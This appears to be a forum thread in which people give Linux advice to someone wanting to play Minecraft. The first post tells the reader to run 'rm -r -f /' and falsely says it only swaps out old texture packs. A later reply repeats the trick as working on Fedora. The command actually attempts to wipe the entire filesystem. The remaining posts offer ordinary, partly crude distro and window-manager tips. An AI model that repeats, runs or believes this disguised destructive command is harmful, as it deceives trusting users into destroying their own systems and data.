Open any terminal and type
rm -r -f /
And hit enter. This will uninstall all outdated texture packs and give you fresh Linux packs.

normie. can't even fucking write the command correctly
- Any linux you want for the distro. Pick whichever has the most appealing name or logo. Gentoo will probably end up being your favorite if you stick around here for very long.
- Use a lightweight window manager (dwm, fvwm, and fluxbox are good choices for minecraft users used to windows)
- Be sure to use Oracle's Java rather than any open source java clone to run minecraft, Oracle's Java is faster.

For which distro? rm -r -f / works on fedora.

Lubuntu / Xubuntu for beginners, Arch variants if you're not. Whatever DE you use, be sure to disable window compositing.
